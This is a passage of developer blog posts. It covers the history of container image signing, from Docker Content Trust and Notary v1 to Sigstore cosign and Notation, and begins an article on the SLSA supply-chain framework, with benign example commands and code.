&lt;td&gt;Docker Official Images' DCT signing certificate expires (8/8). &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; pulls start failing. DCT is effectively dead. Usage was &lt;strong&gt;less than 0.05%&lt;/strong&gt; of all pulls.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Generation One: Notary v1 (Going All-In on TUF, 2015–2025)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Architecture: A TUF Server "Next To" the Registry
&lt;/h3&gt;

&lt;p&gt;In August 2015, Docker released Docker Content Trust (DCT). Setting &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; makes &lt;code&gt;docker push&lt;/code&gt; automatically sign images and &lt;code&gt;docker pull&lt;/code&gt; automatically verify them.&lt;/p&gt;

&lt;p&gt;Underneath was &lt;strong&gt;Notary v1&lt;/strong&gt;. It was a textbook TUF implementation: a Notary server running at a &lt;strong&gt;separate URL&lt;/strong&gt; from Docker Hub, holding the full set of TUF metadata. Quick recap of the four roles:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Key location&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🏛️ Root&lt;/td&gt;
&lt;td&gt;&lt;code&gt;root.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Anchor of trust. Declares public keys for the other 3 roles.&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Offline&lt;/strong&gt; (in a vault)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🎯 Targets&lt;/td&gt;
&lt;td&gt;&lt;code&gt;targets.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Records and signs the digests of images you want to protect.&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Offline&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📸 Snapshot&lt;/td&gt;
&lt;td&gt;&lt;code&gt;snapshot.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Guarantees consistency across metadata (prevents mix-and-match).&lt;/td&gt;
&lt;td&gt;Online&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;⏱️ Timestamp&lt;/td&gt;
&lt;td&gt;&lt;code&gt;timestamp.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Freshness guarantee (prevents replay). Short expiration.&lt;/td&gt;
&lt;td&gt;Online&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;An "offline key" is a key kept on an air-gapped machine or in a physical vault; an "online key" is one that lives on a server for automated updates. &lt;strong&gt;Keeping the Targets key offline&lt;/strong&gt; is the foundation of TUF's security model. This is exactly where things later explode.&lt;/p&gt;

&lt;h4&gt;
  
  
  Push Flow
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsl3jo0w2109r7dfr97w1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsl3jo0w2109r7dfr97w1.png" alt="push flow" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The CLI computes the Manifest's Digest, signs an updated &lt;code&gt;targets.json&lt;/code&gt; with the local Targets key, and uploads it. Step ② is an internal "use the key" operation (dotted line), not a network transfer.&lt;/p&gt;

&lt;h4&gt;
  
  
  Pull Verification Flow
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxu31536u23m4bh1fhi2o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxu31536u23m4bh1fhi2o.png" alt="pull verification flow" width="652" height="777"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Walk Root → Timestamp → Snapshot → Targets, then compare the actual image's Digest from the registry against the record in &lt;code&gt;targets.json&lt;/code&gt;. All four TUF roles in full motion: a spec-faithful architecture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why It Imploded
&lt;/h3&gt;

&lt;p&gt;A theoretically correct architecture collapsed completely in practice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. It forced developers to manage signing keys&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;docker push&lt;/code&gt; prompted for the local Targets key passphrase. Maybe tolerable for solo developers, but for the modern "automate the push from CI/CD" workflow, this was fatal.&lt;/p&gt;

&lt;p&gt;To wire it into CI, you had to put the Targets key (which was supposed to live offline in a vault) into the CI's secret store. &lt;strong&gt;"Putting the offline key online"&lt;/strong&gt;: a contradiction. This breaks the foundation of TUF's security model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Lose the key = repository death&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you lose the Targets key, you can never sign images for that repository again. Key rotation must follow the TUF spec exactly, and the handoff overhead in team development was a nightmare.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Mismatch with the reality of distributed registries&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This was the deepest structural problem. Container images don't deploy only to Docker Hub. AWS ECR, GCP Artifact Registry, Azure Container Registry, GitHub Container Registry, internal Harbor instances... registries are scattered everywhere.&lt;/p&gt;

&lt;p&gt;In the Notary v1 model, every registry needed its own Notary server. Copy an image between registries, and the signature doesn't follow. The industry looked at that operational cost and said "no."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Death of DCT: The Numbers Tell the Story
&lt;/h3&gt;

&lt;p&gt;In the end, fewer than &lt;strong&gt;0.05%&lt;/strong&gt; of all Docker Hub pulls had DCT enabled.&lt;/p&gt;

&lt;p&gt;On August 8, 2025, the oldest DCT signing certificates for Docker Official Images (&lt;code&gt;nginx&lt;/code&gt;, &lt;code&gt;ubuntu&lt;/code&gt;, etc.) expired. Users with &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; could no longer pull even the official images. Docker's response: "Please disable the &lt;code&gt;DOCKER_CONTENT_TRUST&lt;/code&gt; environment variable." DCT quietly died.&lt;/p&gt;

&lt;p&gt;Azure Container Registry began DCT deprecation in March 2025, with full removal scheduled for March 2028. Harbor moved earlier, fully removing Notary v1 in v2.9.0 back in 2023.&lt;/p&gt;




&lt;h2&gt;
  
  
  Generation Two: The OCI Registry-Native Era (2023–present)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Pivot: Put Signatures "Inside the Registry"
&lt;/h3&gt;

&lt;p&gt;What the industry learned from Notary v1's failure: &lt;strong&gt;"Standing up a separate server just for signing doesn't work operationally."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The answer: store signature data directly in the same OCI registry as the image, &lt;strong&gt;as another OCI artifact&lt;/strong&gt; (a blob conforming to the OCI spec). No extra registry to run. Copy the image between registries, and the signature comes along.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;OCI Distribution Specification v1.1.0&lt;/strong&gt;, released in February 2024, formally standardized this approach. It introduced the &lt;strong&gt;Referrers API&lt;/strong&gt; (&lt;code&gt;GET /v2/&amp;lt;name&amp;gt;/referrers/&amp;lt;digest&amp;gt;&lt;/code&gt;), letting clients list all related artifacts (signatures, SBOMs, vulnerability scan results) attached to a given image's Digest.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5uzwfcz6pa8fw6zhac35.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5uzwfcz6pa8fw6zhac35.png" alt="Referrers API" width="800" height="303"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each artifact (signature, SBOM, etc.) points back to the parent image via a &lt;code&gt;subject&lt;/code&gt; field. Verifier tools call the Referrers API to enumerate them and pick what they need to verify. No separate Notary server required.&lt;/p&gt;
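&lt;p&gt;The response is an ordinary OCI index, so filtering it is a one-liner. A sketch with a hand-written stand-in for a Referrers API response (digests are truncated fakes; the Notation &lt;code&gt;artifactType&lt;/code&gt; value is per its docs):&lt;/p&gt;

```shell
# Hand-written stand-in for a GET /v2/{name}/referrers/{digest} response.
cat > referrers.json <<'EOF'
{
  "schemaVersion": 2,
  "mediaType": "application/vnd.oci.image.index.v1+json",
  "manifests": [
    { "artifactType": "application/vnd.cncf.notary.signature",
      "digest": "sha256:1111" },
    { "artifactType": "application/vnd.cyclonedx+json",
      "digest": "sha256:2222" }
  ]
}
EOF

# A verifier enumerates the index and picks out just what it cares about:
jq -r '.manifests[] | select(.artifactType == "application/vnd.cncf.notary.signature") | .digest' referrers.json
```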

&lt;p&gt;Note: in production you usually pick &lt;strong&gt;either Cosign or Notation, not both&lt;/strong&gt;; the diagram draws them side by side only to show that both ride on the same spec. On top of this foundation, two signing projects are now competing for dominance.&lt;/p&gt;

&lt;h3&gt;
  
  
  Sigstore (cosign): The "Selective Bite" of TUF
&lt;/h3&gt;

&lt;p&gt;Sigstore made a clean call. &lt;strong&gt;Stop using TUF's &lt;code&gt;targets.json&lt;/code&gt; to manage image hashes. But don't throw TUF away entirely.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sigstore uses TUF in exactly one place: &lt;strong&gt;safely distributing the root certificate of Fulcio (the signing CA) and the public key of Rekor (the transparency log) to clients.&lt;/strong&gt; The first time you run &lt;code&gt;cosign&lt;/code&gt;, a TUF client behind the scenes walks &lt;code&gt;root.json&lt;/code&gt; → &lt;code&gt;timestamp.json&lt;/code&gt; → &lt;code&gt;snapshot.json&lt;/code&gt; → &lt;code&gt;targets.json&lt;/code&gt; to fetch the certificates and public keys you should trust.&lt;/p&gt;

&lt;p&gt;The heavy use case TUF was originally built for, "managing hashes of hundreds of thousands of packages," was abandoned. Sigstore kept only the lightweight role TUF excels at: "safely distributing root certificates."&lt;/p&gt;

&lt;p&gt;Sigstore also gave a fundamental answer to the "key management is unbearable" problem that killed Notary v1: &lt;strong&gt;don't make developers hold private keys at all (keyless signing).&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You authenticate via an OIDC (OpenID Connect, the standard protocol for ID token issuance) provider (GitHub, Google, etc.), Fulcio issues a short-lived certificate that expires in 10 minutes, and you sign with that certificate. The fact of signing is permanently recorded in Rekor's transparency log. The private key exists for a few seconds in memory and disappears. There is no key to manage in the first place.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gsksdc1059rko53set.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gsksdc1059rko53set.png" alt="sigstore" width="800" height="560"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The revolutionary move: abandon the very idea of "protect the key" and replace it with "sign with a short-lived key, and leave only the signing trace in a public log forever."&lt;/p&gt;
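&lt;p&gt;In CLI terms the whole flow is two commands. A sketch of keyless signing and verification; the image reference and identity strings are placeholders, and the flags follow recent cosign releases:&lt;/p&gt;

```shell
# Keyless sign: cosign opens a browser (or uses the ambient CI OIDC token),
# gets a ~10-minute certificate from Fulcio, signs, and logs the act to Rekor.
cosign sign ghcr.io/example/app@sha256:aaaa   # placeholder reference

# Keyless verify: you pin WHO is allowed to have signed, not a key.
cosign verify \
  --certificate-identity "https://github.com/example/app/.github/workflows/release.yml@refs/tags/v1.0.0" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ghcr.io/example/app@sha256:aaaa
```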

&lt;h3&gt;
  
  
  Notary v2 (Notation): Total Abandonment of TUF
&lt;/h3&gt;

&lt;p&gt;The next-generation Notary project, led by Docker and Microsoft. v1.0.0 released in August 2023. Active development continues as a CNCF Incubating project.&lt;/p&gt;

&lt;p&gt;Notary v2 &lt;strong&gt;completely dropped the TUF specification&lt;/strong&gt;. The four-role structure of Root, Targets, Snapshot, Timestamp is not used at all. Instead, it builds trust on &lt;strong&gt;X.509 certificate chains&lt;/strong&gt; (the same mechanism as HTTPS certificates: trust propagates hierarchically from CA to intermediate CA to leaf certificate), a mechanism battle-tested for decades on the Web.&lt;/p&gt;

&lt;p&gt;The mechanics are identical to SSL/TLS certificate verification. Signers hold X.509 certificates issued by a Certificate Authority (CA). Verifiers maintain a trust store (a list of CAs they trust) and walk the certificate chain attached to the signature to decide whether to trust it. TUF's complex chain of metadata is replaced with existing PKI infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynb1v7r9xog6cdasitgl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynb1v7r9xog6cdasitgl.png" alt="notation" width="749" height="1106"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You don't need to hold keys locally. Plugins connect to cloud KMS services like AWS Signer, Azure Key Vault, or HashiCorp Vault, delegating the signing operation. It also integrates with Kubernetes admission controllers (Ratify, Kyverno) so signature verification can be wired into deployment gates.&lt;/p&gt;
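&lt;p&gt;The day-to-day shape, as a rough sketch; the image reference and store name are placeholders, subcommands follow the Notation docs, and this assumes a signing key (e.g. via a KMS plugin) and a trust policy have already been configured:&lt;/p&gt;

```shell
# Sign: the actual signing operation runs in the configured KMS,
# never on the developer's machine.
notation sign ghcr.io/example/app@sha256:aaaa   # placeholder reference

# Verify: add the publisher's CA certificate to a named trust store,
# then walk the certificate chain on the signature.
notation cert add --type ca --store example ca.crt
notation verify ghcr.io/example/app@sha256:aaaa
```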

&lt;h3&gt;
  
  
  Comparing the Three Approaches
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notary v1 (DCT)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Sigstore (cosign)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notary v2 (Notation)&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use of TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full implementation (4 roles)&lt;/td&gt;
&lt;td&gt;Root certificate distribution only&lt;/td&gt;
&lt;td&gt;Not used&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary server (separate infra)&lt;/td&gt;
&lt;td&gt;Inside OCI registry&lt;/td&gt;
&lt;td&gt;Inside OCI registry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Developer manages locally&lt;/td&gt;
&lt;td&gt;None (keyless signing)&lt;/td&gt;
&lt;td&gt;Delegated to cloud KMS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Trust model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;TUF Root of Trust&lt;/td&gt;
&lt;td&gt;TUF + transparency log (Rekor)&lt;/td&gt;
&lt;td&gt;X.509 certificate chain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD fit&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Requires passphrase entry&lt;/td&gt;
&lt;td&gt;✅ Fully automated via OIDC&lt;/td&gt;
&lt;td&gt;✅ Automated via KMS plugin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Status (2026)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Archived&lt;/td&gt;
&lt;td&gt;✅ Adopted by npm, PyPI, Maven&lt;/td&gt;
&lt;td&gt;✅ CNCF Incubating&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Sidebar: Why Does TUF Work for PyPI?
&lt;/h2&gt;

&lt;p&gt;If you've read this far, this question should be nagging you.&lt;/p&gt;

&lt;p&gt;Notary v1 imploded over "key management is too hard." So how does Python's PyPI, which hosts over 500,000 packages, manage to make TUF (PEP 458) actually work?&lt;/p&gt;

&lt;p&gt;The answer comes down to two structural differences.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Developers don't sign anything
&lt;/h3&gt;

&lt;p&gt;PyPI's TUF deployment (PEP 458) is designed to protect the channel &lt;strong&gt;between the PyPI servers and the &lt;code&gt;pip&lt;/code&gt; command&lt;/strong&gt;. Developers just upload packages to PyPI as before. PyPI's backend automatically computes hashes and &lt;strong&gt;signs &lt;code&gt;targets.json&lt;/code&gt; using PyPI's own online keys&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Developers don't even need to know TUF exists. This is the polar opposite of Notary v1, which forced developers to hold TUF's offline keys.&lt;/p&gt;
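&lt;p&gt;That division of labor can be sketched in a few lines. This is an illustrative stand-in, not the real &lt;code&gt;python-tuf&lt;/code&gt; implementation: the metadata is simplified and the filenames are invented, but the shape follows TUF's targets format.&lt;/p&gt;

```python
import hashlib

# Illustrative stand-in for a (signed) TUF targets.json entry that PyPI's
# backend generates automatically on upload. Field names follow the TUF
# metadata format; the package name and contents here are made up.
def make_targets_entry(filename: str, package_bytes: bytes) -> dict:
    return {
        filename: {
            "length": len(package_bytes),
            "hashes": {"sha256": hashlib.sha256(package_bytes).hexdigest()},
        }
    }

# What a pip-like client does after fetching targets metadata whose
# signature it has already verified against PyPI's online key.
def verify_download(targets: dict, filename: str, downloaded: bytes) -> bool:
    entry = targets[filename]
    if len(downloaded) != entry["length"]:
        return False
    return hashlib.sha256(downloaded).hexdigest() == entry["hashes"]["sha256"]

pkg = b"fake wheel contents"
targets = make_targets_entry("demo-1.0-py3-none-any.whl", pkg)
print(verify_download(targets, "demo-1.0-py3-none-any.whl", pkg))         # True
print(verify_download(targets, "demo-1.0-py3-none-any.whl", pkg + b"!"))  # False
```

&lt;p&gt;The developer never touches any of this: the signing side runs on PyPI's servers, and the verifying side runs inside the installer.&lt;/p&gt;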

&lt;h3&gt;
  
  
  2. Centralized vs. distributed
&lt;/h3&gt;

&lt;p&gt;Python packages all converge on a &lt;strong&gt;single central server&lt;/strong&gt;: &lt;code&gt;pypi.org&lt;/code&gt;. Run one TUF server, and you cover all 500,000 packages.&lt;/p&gt;

&lt;p&gt;Container image registries, by contrast, are &lt;strong&gt;distributed across many places&lt;/strong&gt;: Docker Hub, ECR, GCR, ACR, Harbor... Notary v1 required a TUF server per registry, and operational costs exploded.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;PyPI&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Container ecosystem&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Registry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;One: &lt;code&gt;pypi.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Docker Hub, ECR, GCR, ACR, Harbor...&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Who manages TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PyPI server (automatic)&lt;/td&gt;
&lt;td&gt;Developers themselves (Notary v1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Result&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Developers don't see TUF&lt;/td&gt;
&lt;td&gt;❌ Developers burned out on key management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;PyPI also spent years exploring "end-to-end signing by developers themselves" as &lt;strong&gt;PEP 480&lt;/strong&gt;. But ultimately it gave up on forcing TUF-based key management onto developers and pivoted to &lt;strong&gt;Trusted Publishers&lt;/strong&gt; (launched April 2023) using GitHub Actions OIDC. This is the same "OIDC + short-lived tokens" approach as Sigstore.&lt;/p&gt;

&lt;p&gt;Docker, PyPI, npm: they all converged on the same conclusion. &lt;strong&gt;"Making developers manage private keys does not work."&lt;/strong&gt; Notary v1's death is a lesson the entire industry has internalized.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;"How do you protect the hash of a container image with TUF's Targets?"&lt;/p&gt;

&lt;p&gt;In the old days, you protected it with &lt;code&gt;targets.json&lt;/code&gt; (Notary v1). But in a distributed container ecosystem, the model that asks developers to manage offline keys completely fell apart. Today, instead of tracking the image digest in TUF metadata, signatures live alongside the image in the OCI registry itself (Sigstore / Notary v2).&lt;/p&gt;

&lt;p&gt;Security that nobody uses is not security. The decade of Notary v1 proved that.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/blog/retiring-docker-content-trust/" rel="noopener noreferrer"&gt;Docker Blog: Retiring Docker Content Trust&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infoq.com/news/2025/08/docker-content-trust-retirement/" rel="noopener noreferrer"&gt;InfoQ: Docker Retires Docker Content Trust with Less Than 0.05% of Image Pulls Using DCT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-content-trust" rel="noopener noreferrer"&gt;Microsoft: Deprecation of Docker Content Trust on Azure Container Registry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/blog/notary-v2-and-signing-requirements/" rel="noopener noreferrer"&gt;Docker Blog: Notary v2 and Signing Requirements (Dec 2019 kickoff)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/goharbor/harbor/wiki/Harbor-Notary-v1-Migration-Guide" rel="noopener noreferrer"&gt;Harbor: Notary v1 Removal (v2.9.0)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/opencontainers/distribution-spec/releases/tag/v1.1.0" rel="noopener noreferrer"&gt;OCI Distribution Specification v1.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://notaryproject.dev/" rel="noopener noreferrer"&gt;Notary Project (Notation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.sigstore.dev/" rel="noopener noreferrer"&gt;Sigstore&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.sigstore.dev/sigstore-root-key-ceremony/" rel="noopener noreferrer"&gt;Sigstore Blog: Root Key Ceremony (June 18, 2021)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0458/" rel="noopener noreferrer"&gt;PEP 458: Secure PyPI downloads with signed repository metadata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0480/" rel="noopener noreferrer"&gt;PEP 480: Surviving a Compromise of PyPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/" rel="noopener noreferrer"&gt;PyPI Blog: Trusted Publishers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>docker</category>
      <category>supplychain</category>
      <category>sigstore</category>
    </item>
    <item>
      <title>SLSA Deep Dive: Securing the Supply Chain Using Verifiable Levels</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 26 Apr 2026 04:59:20 +0000</pubDate>
      <link>https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk</link>
      <guid>https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;When I first investigated the SolarWinds incident, one technical detail absolutely floored me.&lt;/p&gt;

&lt;p&gt;The attackers planted malware called &lt;strong&gt;SUNSPOT&lt;/strong&gt; on SolarWinds' build servers. SUNSPOT monitored the build process every single second, and the moment the Orion platform build kicked off, it swapped the &lt;code&gt;InventoryManager.cs&lt;/code&gt; source code with a backdoored version. Once the build finished, it swapped it back. Zero traces were left in the source code repository. The resulting binary was signed with a perfectly legitimate SolarWinds certificate and shipped to over 18,000 organizations.&lt;/p&gt;

&lt;p&gt;The most terrifying part of this attack? &lt;strong&gt;The signature was 100% valid.&lt;/strong&gt; Code signing only guarantees "this signer signed this file." It completely fails to guarantee "this binary was built from the correct source code via an untampered build process."&lt;/p&gt;

&lt;p&gt;The 2021 Codecov incident shared a similar structure. Attackers used leaked credentials to upload a malicious script directly into a GCS bucket, completely bypassing the build process. Users downloaded it directly. An artifact that never even touched the build process was distributed as legitimate.&lt;/p&gt;

&lt;p&gt;So, what would have stopped this? What we need is &lt;strong&gt;verifiable evidence&lt;/strong&gt; recording "which source this binary came from, on what platform it was built, and exactly how it was produced."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SLSA (Supply-chain Levels for Software Artifacts, pronounced 'salsa')&lt;/strong&gt; is a framework explicitly designed to generate and verify this exact evidence. Google proposed it in 2021, and it's now an OpenSSF project. v1.1 was officially approved in April 2025, and v1.2, which introduced the Source Track, dropped in November 2025.&lt;/p&gt;

&lt;p&gt;In this deep dive, we are ripping through the primary SLSA specification to explain exactly what we are protecting and how we protect it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Prerequisites: What You Need to Know
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is the Supply Chain?
&lt;/h3&gt;

&lt;p&gt;The software supply chain encompasses every single step from writing code to running it on a user's machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0mksfd1w6s3ofj5hjbyp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0mksfd1w6s3ofj5hjbyp.png" alt="Supply Chain" width="800" height="105"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Between &lt;code&gt;git push&lt;/code&gt; and &lt;code&gt;npm install&lt;/code&gt; or &lt;code&gt;docker pull&lt;/code&gt;, a massive amount of infrastructure intervenes: the build platform, dependency resolution, publishing, and distribution. &lt;strong&gt;Every single point in this diagram is a target.&lt;/strong&gt; SolarWinds was a compromise of the "Build Platform," while Codecov was an attack on the "Distribution."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Limits of Code Signing
&lt;/h3&gt;

&lt;p&gt;Digital signatures guarantee exactly two things: "The owner of the private key signed this," and "It hasn't been modified since." That's it. It guarantees absolutely nothing else.&lt;/p&gt;

&lt;p&gt;SUNSPOT swapped the source code &lt;em&gt;during&lt;/em&gt; the build. The resulting binary was then signed with a legitimate certificate. &lt;strong&gt;The signature was mathematically perfect. But nobody could verify the relationship between the source code and the final binary.&lt;/strong&gt;&lt;/p&gt;
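&lt;p&gt;You can demonstrate that gap in a few lines. This toy uses HMAC as a stand-in for a real code-signing key (the key, helper names, and artifact bytes are all invented), but the same blind spot applies to X.509 signing:&lt;/p&gt;

```python
import hmac, hashlib

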